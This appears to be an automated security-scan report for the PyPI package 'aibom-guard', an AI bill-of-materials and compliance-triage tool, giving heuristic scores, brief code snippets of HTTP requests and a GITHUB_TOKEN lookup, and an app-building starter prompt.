aibom-guard

v0.2.0 suspicious
6.0
Medium Risk

AI Bill of Materials generation + EU AI Act / ISO 42001 / NIST AI RMF compliance triage

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package shows signs of potentially legitimate functionality but raises concerns due to recent repository creation, rapid commit history, and credential retrieval practices.

  • Recent repository creation with rapid commit history
  • Credentialed access retrieval that may indicate credential harvesting
Per-check LLM notes
  • Network: The network calls suggest the package is making HTTP requests to external URLs, which could be legitimate if the package's purpose involves interacting with external services.
  • Shell: No shell execution patterns were detected.
  • Obfuscation: No obfuscation patterns detected in the provided code snippet.
  • Credentials: The code snippet attempts to retrieve a GITHUB_TOKEN either from a variable or an environment variable, which could indicate potential credential harvesting if not used for legitimate purposes like API authentication.
  • Metadata: The repository was created very recently with all commits happening within a short timeframe, indicating potential suspicious activity.

📦 Package Quality Overall: Medium (5.0/10)

✦ High Test Suite 9.0

Test suite present — 1 test file(s) found

  • Test runner config found: pyproject.toml
  • 1 test file(s) detected (e.g. test_pipeline.py)
◈ Medium Documentation 7.0

Some documentation present

  • Documentation URL: "Documentation" -> https://github.com/AnousonePhyakeo/aibom-guard#readme
  • Detailed PyPI description (9423 chars)
○ Low Contributing Guide 2.0

No contributing guide or governance files found

  • No CONTRIBUTING, CODE_OF_CONDUCT, or governance files found
◈ Medium Type Annotations 5.0

Partial type annotation coverage

  • 38 type-annotated function signatures detected in source
○ Low Multiple Contributors 2.0

Single-author or unverifiable project

  • 1 unique contributor(s) across 8 commits in AnousonePhyakeo/aibom-guard
  • Single author with few commits — possibly a personal or throwaway project

🔬 Heuristic Checks

Outbound Network Calls score 7.5

Found 5 network call pattern(s)

  • list: try: req = urllib.request.Request(url, headers=headers) with urllib.request.ur
  • headers=headers) with urllib.request.urlopen(req, timeout=_TIMEOUT) as resp: return j
  • l_id}" try: req = urllib.request.Request( url, headers={"User-Agent":
  • son"}, ) with urllib.request.urlopen(req, timeout=_TIMEOUT) as resp: data = j
  • request try: with urllib.request.urlopen(_CDX_SCHEMA_URL, timeout=8) as resp: sch
Code Obfuscation

No obfuscation patterns detected

Shell / Subprocess Execution

No shell execution patterns detected

Credential Harvesting score 2.5

Found 1 credential access pattern(s)

  • """ token = token or os.environ.get("GITHUB_TOKEN", "") if not token: return { "sourc
Typosquatting

No typosquatting candidates detected

Registered Email Domain

Email domain looks legitimate: gmail.com>

Suspicious Page Links

All external links appear legitimate

Git Repository History score 7.5

Git history flags: Repository created very recently: 4 day(s) ago (2026-06-03T03:00:12Z)

  • Repository created very recently: 4 day(s) ago (2026-06-03T03:00:12Z)
  • Repository has zero stars and zero forks
  • All 8 commits happened within 24 hours
Maintainer History score 6.0

3 maintainer concern(s) found

  • Only one version has ever been released — brand new package
  • Author name is missing or very short
  • Author "" appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with aibom-guard 
Create a mini-application named 'AI Compliance Buddy' that leverages the 'aibom-guard' Python package to assist developers and organizations in ensuring their AI projects comply with various regulatory frameworks such as the EU AI Act, ISO 42001, and NIST AI RMF standards. The application should include the following features:

1. **AI Bill of Materials (BoM) Generation**: Users should be able to input details about their AI project components (e.g., datasets, models, libraries), and the app should generate a comprehensive BoM that lists all components and their respective versions.

2. **Compliance Triage**: After generating the BoM, the application should analyze each component against the mentioned regulatory frameworks and provide a summary of compliance status for each framework.

3. **Actionable Recommendations**: For components that do not meet compliance requirements, the application should offer actionable recommendations on how to address non-compliance issues.

4. **Integration with Version Control Systems**: Allow users to integrate their local or remote version control systems (e.g., Git) to automatically update the BoM when changes are made to the project's dependencies.

5. **User-Friendly Interface**: Develop a simple yet intuitive web-based interface using Flask or Django for the application, making it accessible and user-friendly.

The 'aibom-guard' package will be utilized to handle the core functionalities of generating the BoM and performing the compliance triage. Your task is to design and implement this application from scratch, including setting up the environment, integrating the 'aibom-guard' package, developing the necessary backend logic, and creating the frontend interface.